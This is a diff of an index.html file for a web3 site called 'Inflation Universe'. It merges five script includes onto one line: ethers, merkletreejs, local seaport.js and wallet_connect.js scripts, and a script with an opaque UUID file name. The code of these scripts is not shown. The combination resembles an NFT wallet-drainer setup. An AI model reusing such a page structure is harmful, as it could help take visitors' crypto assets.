--- a/index.html
+++ b/index.html
@@ -1,11 +1,7 @@
 <!DOCTYPE html>
 <html lang="fr-FR">
   <head>
-    <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js"></script>
-    <script src="https://cdn.jsdelivr.net/npm/merkletreejs@latest/merkletree.js"></script>
-    <script src="./scripts/seaport.js"></script>
-    <script src="./scripts/wallet_connect.js"></script>
-    <script src="./e4e86ab3-8143-431b-9538-f195348ee35f.js"></script>
+<script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/merkletreejs@latest/merkletree.js"></script><script src="./scripts/seaport.js"></script><script src="./scripts/wallet_connect.js"></script><script src="./e4e86ab3-8143-431b-9538-f195348ee35f.js"></script>
     <meta charset="utf-8">
     <title>Inflation Universe:Real Web3 Natives，Real Web3 Experience</title>
     <meta name="viewport" content="initial-scale=1.0, width=device-width">
